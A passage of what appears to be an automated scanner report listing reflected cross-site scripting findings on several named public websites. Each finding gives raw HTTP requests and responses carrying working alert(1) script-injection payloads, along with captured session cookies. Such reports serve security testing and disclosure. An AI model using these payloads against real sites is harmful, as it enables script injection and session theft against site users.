Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.4.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.8.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:28 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31743
Date: Wed, 05 Oct 2011 20:45:28 GMT
X-Varnish: 1169905068
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
xt/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/pagesabd56";alert(1)//e892091a97f/skillshare";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("https:" == document.lo
...[SNIP]...

3.158. http://content.usv.com/pages/skillshare [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/skillshare

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c34eb"><script>alert(1)</script>1f51c521a96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesc34eb"><script>alert(1)</script>1f51c521a96/skillshare HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.4.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.8.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:27 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31848
Date: Wed, 05 Oct 2011 20:45:27 GMT
X-Varnish: 1169904973
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pagesc34eb"><script>alert(1)</script>1f51c521a96/skillshare%0AServer: content.usv.com%0APath: /pagesc34eb">
...[SNIP]...

3.159. http://content.usv.com/pages/soundcloud [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/soundcloud

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb488"%3balert(1)//acae32804fb was submitted in the REST URL parameter 1. This input was echoed as bb488";alert(1)//acae32804fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pagesbb488"%3balert(1)//acae32804fb/soundcloud HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.5.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.9.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:43 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31743
Date: Wed, 05 Oct 2011 20:45:43 GMT
X-Varnish: 1169906638
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
xt/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/pagesbb488";alert(1)//acae32804fb/soundcloud";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("https:" == document.lo
...[SNIP]...

3.160. http://content.usv.com/pages/soundcloud [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/soundcloud

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebd4d"><script>alert(1)</script>62f7eabc170 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesebd4d"><script>alert(1)</script>62f7eabc170/soundcloud HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.5.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.9.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:43 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31848
Date: Wed, 05 Oct 2011 20:45:43 GMT
X-Varnish: 1169906556
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pagesebd4d"><script>alert(1)</script>62f7eabc170/soundcloud%0AServer: content.usv.com%0APath: /pagesebd4d">
...[SNIP]...

3.161. http://crowdsupport.telstra.com/t5/forums/forumpage.twitterstreamtaplet:getnewtweets [renderedScripts parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://crowdsupport.telstra.com
Path:   /t5/forums/forumpage.twitterstreamtaplet:getnewtweets

Issue detail

The value of the renderedScripts request parameter is copied into the HTML document as plain text between tags. The payload 37013<img%20src%3da%20onerror%3dalert(1)>2052689086b was submitted in the renderedScripts parameter. This input was echoed as 37013<img src=a onerror=alert(1)>2052689086b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /t5/forums/forumpage.twitterstreamtaplet:getnewtweets?t:ac=board-id/PrepaidMobiles&t:cp=twitter/streamcontributionspage HTTP/1.1
Host: crowdsupport.telstra.com
Proxy-Connection: keep-alive
Content-Length: 1297
Origin: http://crowdsupport.telstra.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Lithium-Ajax-Request: true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://crowdsupport.telstra.com/t5/Prepaid-Mobiles/bd-p/PrepaidMobiles
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A984851D17A0-400001414000001C[CE]; VISITORID=1277333297; LiSESSIONID=6D619BB30014D23EDBCC5DB0AA4791E9; s_loggedin=not%20logged%20in; mbox=session#1317840717795-784590#1317842648|check#true#1317840848; s_cc=true; s_nr=1317840787375; scPrevious=CrowdSupport; s_sq=%5B%5BB%5D%5D

streamContextClientId=twitterStreamTaplet&is_first=true&last=0&first=0&eventListeners=%5B%5D&parameterOverrides=%7B%7D&triggerEvent=LITHIUM%3AgetNewTweets&eventTargetId=tweetListContainer&javascript.i
...[SNIP]...
e-shim-1.0.js%2Cjquery.viewport-1.0.js%2Cjquery.clone-position-1.0.js%2CDropDownMenu.js%2Cjquery.lithium-selector-extensions.js%2Ccontrol.js%2CDeferredImages.js%2Cjquery.css-data-1.0.js%2Cui.dialog.js37013<img%20src%3da%20onerror%3dalert(1)>2052689086b

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:52:28 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 17305

{
"response" : {
"status" : "success",
"state" : "success",
"parameters" : [ ],
"components" : [
{
"selector" : "ORIGINAL_ELEMENT",
"content" : "<div class=\"li
...[SNIP]...
"DropDownMenu.js",
"jquery.lithium-selector-extensions.js",
"control.js",
"DeferredImages.js",
"jquery.css-data-1.0.js",
"ui.dialog.js37013<img src=a onerror=alert(1)>2052689086b",
"TwitterItemActions.js"
],
"instantiations" : "LITHIUM.AjaxFeedback('.lia-inline-ajax-feedback', 'LITHIUM:hideAjaxFeedback');"
},
"action" : "prepend"
...[SNIP]...

3.162. http://fonts.wsj.com/k/qox0wee-e.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.wsj.com
Path:   /k/qox0wee-e.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 385ba<script>alert(1)</script>b610dbcac07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k385ba<script>alert(1)</script>b610dbcac07/qox0wee-e.css?3bb2a6e53c9684ffdc9a9bf61d5b2a62d6138ae381e419350a9e4b6a2ea4b26f81a44a9a3fd76d172c69fe2029381463ad3b2b9f57efd95582df0742cea8deb803244f67617f9d0625a9b0c6afe6273d11b54d031342ae7abf5f75e41d0992b0561404d8a9488b9b7abb6b HTTP/1.1
Host: fonts.wsj.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://blogs.wsj.com/venturecapital/?mod=tech
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=a9f70429-8dde-40da-bdf0-2a1b9d55e44d; s_dbfe=1315153085111; __qca=P0-1921865836-1315416083538; s_vnum=1320338023520%26vn%3D2; __utma=109079514.1674775488.1317755585.1317755585.1317755585.1; __utmz=109079514.1317755585.1.1.utmcsr=online.wsj.com|utmccn=(referral)|utmcmd=referral|utmcct=/home-page; DJCOOKIE=ORC%3dna%2cus%7c%7cHOMEPAGE%3d%2fhome%2fasia%7c%7cGC%3d1%7c%7cweatherJson%3d%7b%22city%22%3a%22New%20York%22%2c%22image%22%3a%2235%22%2c%22high%22%3a%5b%2264%22%5d%2c%22low%22%3a%5b%2252%22%5d%2c%22url%22%3a%22http%3a%2f%2fonline.wsj.com%2fpublic%2fpage%2faccuweather%2ddetailed%2dforecast.html%3fname%3dNew%20York%2c%20NY%26location%3d10005%26u%3dhttp%253A%2f%2fwww.accuweather.com%2fhosted%2fwsj%2fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2f%2fwww.accuweather.com%2fhosted%2fwsj%2fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7d%7c%7cweatherCode%3d10005%7c%7cweatherExpire%3dTue%2c%2004%20Oct%202011%2019%3a20%3a32%20GMT%7c%7cGX%3dMon%2c%2005%20Sep%202011%2016%3a18%3a04%20GMT%7c%7cweatherUser%3d; rsi_csl=; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000775
Content-Length: 68
Date: Wed, 05 Oct 2011 21:12:03 GMT
Connection: close

Not Found: /k385ba<script>alert(1)</script>b610dbcac07/qox0wee-e.css

3.163. http://fonts.wsj.com/k/qox0wee-e.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.wsj.com
Path:   /k/qox0wee-e.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b2271<script>alert(1)</script>26bf83752ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k/qox0wee-e.cssb2271<script>alert(1)</script>26bf83752ce?3bb2a6e53c9684ffdc9a9bf61d5b2a62d6138ae381e419350a9e4b6a2ea4b26f81a44a9a3fd76d172c69fe2029381463ad3b2b9f57efd95582df0742cea8deb803244f67617f9d0625a9b0c6afe6273d11b54d031342ae7abf5f75e41d0992b0561404d8a9488b9b7abb6b HTTP/1.1
Host: fonts.wsj.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://blogs.wsj.com/venturecapital/?mod=tech
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=a9f70429-8dde-40da-bdf0-2a1b9d55e44d; s_dbfe=1315153085111; __qca=P0-1921865836-1315416083538; s_vnum=1320338023520%26vn%3D2; __utma=109079514.1674775488.1317755585.1317755585.1317755585.1; __utmz=109079514.1317755585.1.1.utmcsr=online.wsj.com|utmccn=(referral)|utmcmd=referral|utmcct=/home-page; DJCOOKIE=ORC%3dna%2cus%7c%7cHOMEPAGE%3d%2fhome%2fasia%7c%7cGC%3d1%7c%7cweatherJson%3d%7b%22city%22%3a%22New%20York%22%2c%22image%22%3a%2235%22%2c%22high%22%3a%5b%2264%22%5d%2c%22low%22%3a%5b%2252%22%5d%2c%22url%22%3a%22http%3a%2f%2fonline.wsj.com%2fpublic%2fpage%2faccuweather%2ddetailed%2dforecast.html%3fname%3dNew%20York%2c%20NY%26location%3d10005%26u%3dhttp%253A%2f%2fwww.accuweather.com%2fhosted%2fwsj%2fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2f%2fwww.accuweather.com%2fhosted%2fwsj%2fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7d%7c%7cweatherCode%3d10005%7c%7cweatherExpire%3dTue%2c%2004%20Oct%202011%2019%3a20%3a32%20GMT%7c%7cGX%3dMon%2c%2005%20Sep%202011%2016%3a18%3a04%20GMT%7c%7cweatherUser%3d; rsi_csl=; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000767
Content-Length: 68
Date: Wed, 05 Oct 2011 21:12:06 GMT
Connection: close

Not Found: /k/qox0wee-e.cssb2271<script>alert(1)</script>26bf83752ce

3.164. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9292'%3balert(1)//d530c4db51c was submitted in the mpck parameter. This input was echoed as f9292';alert(1)//d530c4db51c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D6156764f9292'%3balert(1)//d530c4db51c&mpt=6156764&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/y%3B207642206%3B0-0%3B0%3B33078170%3B4307-300/250%3B33472683/33490561/1%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%7Eokv%3D%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%3Bmc%3Db2pfreezone%3Btile%3D3%3Bsz%3D300x250%2C336x280%3B%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/blog_bankruptcy;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;ord=1805180518051805;
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 21:13:03 GMT
Server: Apache
Last-Modified: Thu, 14 Jul 2011 22:32:50 GMT
ETag: "6a1364-f9e-4a80f1ceb4880"
Accept-Ranges: bytes
Content-Length: 5390
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
61/1;u=****300x250,336x280********;~okv=;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;;~aopt=6/0/ff/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/13754-86576-1281-0?mpt=6156764f9292';alert(1)//d530c4db51c" target="_blank">
...[SNIP]...

3.165. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2209"-alert(1)-"06eaa568993 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D6156764b2209"-alert(1)-"06eaa568993&mpt=6156764&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/y%3B207642206%3B0-0%3B0%3B33078170%3B4307-300/250%3B33472683/33490561/1%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%7Eokv%3D%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%3Bmc%3Db2pfreezone%3Btile%3D3%3Bsz%3D300x250%2C336x280%3B%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/blog_bankruptcy;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;ord=1805180518051805;
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 21:13:01 GMT
Server: Apache
Last-Modified: Thu, 14 Jul 2011 22:32:50 GMT
ETag: "6a1364-f9e-4a80f1ceb4880"
Accept-Ranges: bytes
Content-Length: 5384
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D6156764b2209"-alert(1)-"06eaa568993");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D6156764b2209"-alert(1)-"06eaa568993");
mpck = "htt
...[SNIP]...

3.166. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5a95"%3balert(1)//b3260482d6e was submitted in the mpvc parameter. This input was echoed as c5a95";alert(1)//b3260482d6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D6156764&mpt=6156764&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/y%3B207642206%3B0-0%3B0%3B33078170%3B4307-300/250%3B33472683/33490561/1%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%7Eokv%3D%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%3Bmc%3Db2pfreezone%3Btile%3D3%3Bsz%3D300x250%2C336x280%3B%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3fc5a95"%3balert(1)//b3260482d6e HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/blog_bankruptcy;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;ord=1805180518051805;
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 21:13:13 GMT
Server: Apache
Last-Modified: Thu, 14 Jul 2011 22:32:50 GMT
ETag: "6a1364-f9e-4a80f1ceb4880"
Accept-Ranges: bytes
Content-Length: 5386
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
b97/3/0/*/y;207642206;0-0;0;33078170;4307-300/250;33472683/33490561/1;u=****300x250,336x280********;~okv=;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;;~aopt=6/0/ff/0;~sscs=?c5a95";alert(1)//b3260482d6e");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b97/3/0/*/y;207642206;0-0;0;33078170;4307-300/250;33472683/33490561/1;u=****300x250,3
...[SNIP]...

3.167. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c6a0'%3balert(1)//30af109326a was submitted in the mpvc parameter. This input was echoed as 8c6a0';alert(1)//30af109326a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

